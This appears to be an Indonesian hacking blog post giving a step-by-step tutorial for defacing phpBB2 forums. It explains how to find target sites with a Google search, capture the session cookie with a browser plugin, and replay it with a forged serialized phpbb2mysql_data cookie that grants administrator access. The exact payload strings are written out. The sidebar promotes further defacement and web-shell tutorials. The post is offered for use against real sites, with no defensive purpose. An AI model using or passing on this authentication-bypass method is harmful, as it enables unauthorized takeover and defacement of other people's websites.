Langkah-Langkah
Deface PHPBB/PHPBB2
Loser_cs_20
1. Download browser
Mozilla FireFox
2. Download pluginnya
yg bernama
LiveHTTPHeader
download di http://
livehttpheaders.
mozdev.org/
installation.html
cari yg paling baru
3. selanjutnya cari
target dengan Uncle
Google dgn syntax :
phpBB site:[terserah
apa aja]
4. setelah itu buka
plugin yg kita
download tadi di Tools
-> LiveHTTPHeader
5. Ingat, isi
LiveHTTPHeader harus
kosong
6. buka situs target,
dengan begitu
LiveHTTPHeader akan
mengambil semua
cookie yg tercatat di
halaman target
7. setelah halaman
sukses terbuka ditandai
dengan tanda "done" di
bawah browser,
langkah selanjutnya
adalah mengklik
LiveHTTPHeader di
bagian tengahnya
dilanjutkan mengklik
opsi Replay..
8. setelah
LiveHTTPReplay
terbuka liat bagian
seperti dibawah ini
pada LiveHTTPReplay...
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D;
phpbb2mysql_sid=88
da2bbdc1a3a789df094
d50d91f7e3b
9. Hapus bagian yg
belakang setelah tanda
semi colon (
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D;
phpbb2mysql_sid=88
da2bbdc1a3a789df094
d50d91f7e3b
\_______________hapus
bagian
ini_________________/
jadinya akan seperti ini :
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D
10. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
11. selanjutnya
perhatikan langkah di
bawah ini:
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D
\________hapus bagian
ini dan di ganti dengan:
Cookie:
phpbb2mysql_data=a:2
{s:11:"autologinid";s:32:"
602baahpepms74d4cb
6f2d012e1e4019";s:6:"
userid";s:1:"2";}
12. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
tadi.
13. perhatikan lagi
langkah ini:
Cookie:
phpbb2mysql_data=a:2:
{s:11:"autologinid";s:32:"
602baahpepms74d4cb
6f2d012e1e4019";s:6:"
userid";s:1:"2";}
\__________________________
_bagian ini jg digantilagi
_______________
________________/
menjadi seperti ini:
Cookie:
phpbb2mysql_data=a
%3A2%3A%7Bs
%3A11%3A
%22autologinid
%22%3Bb%3A1%3Bs
%3A6%3A%22userid
%22%3Bs%3A1%3A
%222%22%3B%7D
14. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
tadi.
15. selesai, silakan liat
halaman target, kalo
anda beruntung anda
mendapatkan full
admin.
Silakan pergi ke bawah
halaman dan lihat opsi
"Go To Administration
Panel" telah muncul
Popular Posts
-
Assalamuallaikum ^_^ kali ini saya akan membagikan cara mudah untuk men-download video di Youtube tanpa software. Youtube, menjadi situs u... -
Siang sob ^_^ Sebenernya gw binggung mau nge-share apa :v Yaudah deh mending gw share cara Deface Website dengan teknik XSS Vulnerability ~ ... -
Assalamuallaikum ^_^ kali ini saya mau berbagi cara memasukan kode lagu (lagu) dalam script deface atau HTML pasti bosen kan tanpa lagu :v w... -
Halo ^_^ kali ini saya mau share tentang Shell backdor :v langsung saja 1. R57 Shell Download 2. C99 Shell Download 3. B374K Shell Download... -
DEFACE Secara singkat Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs, Teknik ini biasa di lakuka... -
Oke jumpa lagi dengan saya... hehehe. Kali ini mau share seddikit trik deface ala newbie dengan dorking shell. Biasa nya defacer memasang s... -
Assalamuallaikum halo ^_^ saya balik lagi saya dapet hadiah :v wkwkwk iseng2 uplek2 sendiri domain sch.id eh dapet trick :p langsung saja D... -
iseng2 nanem shell di web Indonesia Ngetes aja. Kebetulan pake server LitleSpeed. Nah, pada tau kan pasti Disabled Function nya banyak bang... -
Teknik ini sebenarnya sudah lama sekali ~ Teknik ini sangat mudah sekali jadi cocok untuk para newbie yang ingin belajar deface termasuk ... -
Assalamuallaikum ^_^ kali ini saya mau share tentang bagaimana cara upload shell com_user versi ke-2 versi 1 silahkan KLIK DISINI oke bahan...
0 comments:
Post a Comment